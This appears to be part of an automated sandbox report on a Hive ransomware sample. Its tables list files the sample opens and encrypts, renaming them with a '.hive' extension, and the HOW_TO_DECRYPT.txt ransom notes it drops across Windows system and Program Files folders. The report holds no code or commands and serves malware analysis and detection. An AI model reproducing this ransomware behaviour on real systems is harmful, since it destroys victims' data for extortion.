| File created | C:\Windows\System32\spp\tokens\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\c_fscopyprotection.inf_amd64_9c108d8ac558a80d\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmfj2.inf_amd64_167948d0c94abc27\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\stornvme.inf_amd64_1218fad01506b7af\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\tsusbhub.inf_amd64_bd91a147ab4ebf1c\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\Com\dmp\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\Licenses\neutral\OEM\Professional\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\_Default\Professional\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\c_extension.inf_amd64_7891c7d003f5e96b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\fidohid.inf_amd64_c446be9403cdcdb1\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Speech\SpeechUX\uk-UA\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WCN\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Kds\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Local\tw-c28-c2c-2f6b.tmp\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\ko-KR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Boot\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Configuration\Registration\MSFT_FileDirectoryConfiguration\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\bthleenum.inf_amd64_11f9ff6c12dbf9b5\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\InputMethod\CHT\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Local\tw-d60-d90-a182.tmp\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\rspndr.inf_amd64_4e80c2bb5314f071\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Speech\Engines\SR\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WDI\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{6f126544-600f-4756-8792-b71c4e30f413}\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_GroupResource\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\pl-PL\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\c_fsencryption.inf_amd64_b4b4845819a23338\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForAny\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WindowsOptionalFeature\uk-UA\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.P7EsMTWem2f4DapaPblE9JLMqb0GT-MsqSXfDBplsgc.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.scale-400.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL002.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ONBttnPPT.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\202.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-60_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailSplashLogo.scale-250.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-hover_32.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\PREVIEW.GIF.P7EsMTWem2f4DapaPblE9BlnkxlS9YQllD3nUpaK9Eo.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\resources.pak.DATA.P7EsMTWem2f4DapaPblE9PSmXvAta_JqUP56tyeEGTo.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsMedTile.contrast-black_scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailSmallTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Security.SecureString.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui.P7EsMTWem2f4DapaPblE9AuHrQaaDXlDVGqGIllTijo.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-namedpipe-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ViewOnly_ZeroGrace-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GADUGIB.TTF.P7EsMTWem2f4DapaPblE9N9WkJwDaKIFhphO3V9SeQ4.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\zlibwapi.dll.P7EsMTWem2f4DapaPblE9FAK8e5LuWsFN3tP-2Rk0wc.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ro.pak.P7EsMTWem2f4DapaPblE9OxFCp75q308UWmFVzVcogg.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\NewNotePlaceholder-dark.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Subscription-ppd.xrm-ms.P7EsMTWem2f4DapaPblE9Iug6pFcybIlgFi-LU92Yhw.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Runtime.InteropServices.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-sl\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailLargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\proofing.msi.16.en-us.tree.dat.P7EsMTWem2f4DapaPblE9PELDBezftc1xes91Op6jBs.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right.gif.P7EsMTWem2f4DapaPblE9IPXwRs6EwMqDK5EsTxwVUA.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js.P7EsMTWem2f4DapaPblE9CEvoU-M2td-iXWpVvrfvGg.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\en-US\PackageManagementDscUtilities.strings.psd1.P7EsMTWem2f4DapaPblE9PZJe1ZgBUwtbzbv8rzUuBc.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Controls\EndOfLife\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_hover_18.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_field_grabber.png.P7EsMTWem2f4DapaPblE9O_MlC_RsF44NXcIPKcbIwc.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteSmallTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\IC_WelcomeBanner.scale-100.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Text.Encodings.Web.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\decora_sse.dll.P7EsMTWem2f4DapaPblE9PD0BmXDN7JX9keKpkGeX1o.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-30_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MEIPreload\preloaded_data.pb.DATA.P7EsMTWem2f4DapaPblE9Ou3jzKHGGsk_4I_XnnhIEA.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_PrepidBypass-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_PigNose.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_ur.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\PresentationFramework.resources.dll.P7EsMTWem2f4DapaPblE9DGMyl3gAfgbESWq6F7fSiQ.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\prism_common.dll.P7EsMTWem2f4DapaPblE9HXDaPkZ-gZv9DM0I8sk2xE.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.Preview.winmd | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..lowbroker.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_521d56dcb4ef479b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-hlink_31bf3856ad364e35_10.0.19041.1237_none_d6d991394db08f86\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-m..ac-ado-ddl-security_31bf3856ad364e35_10.0.19041.264_none_9a64e210d3a49e6c\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-dafwfdprovider_31bf3856ad364e35_10.0.19041.1_none_b058c457605b2980\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-k..l-pnp-adm.resources_31bf3856ad364e35_10.0.19041.1_it-it_e961f8e21ea93e0a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-m..mentmanifests-shell_31bf3856ad364e35_10.0.19041.423_none_9e37e96dfd85e9b1\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-mapcontrol-desktop_31bf3856ad364e35_10.0.19041.746_none_2999d52b8db06219\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_windows-id-connecte..nt-provider-activex_31bf3856ad364e35_10.0.19041.1_none_211e6839b16031fe\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-n..rity-domain-clients_31bf3856ad364e35_10.0.19041.1_none_db2033aec5f4055d\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-i..l-keyboard-0000044b_31bf3856ad364e35_10.0.19041.1_none_b2edb67cf59d8460\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-ie-setup.resources_31bf3856ad364e35_11.0.19041.1_uk-ua_651962b808b5b764\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-certutil.resources_31bf3856ad364e35_10.0.19041.1_es-es_85df3743bdb65309\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-explorer.resources_31bf3856ad364e35_10.0.19041.1023_en-us_7aca3dab28c636fc\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\x86_system.printing_31bf3856ad364e35_10.0.19041.1_none_cd12d4bd5d1c62ec\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-mdm-adm_31bf3856ad364e35_10.0.19041.1_none_afd04b8235cdb4f2\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
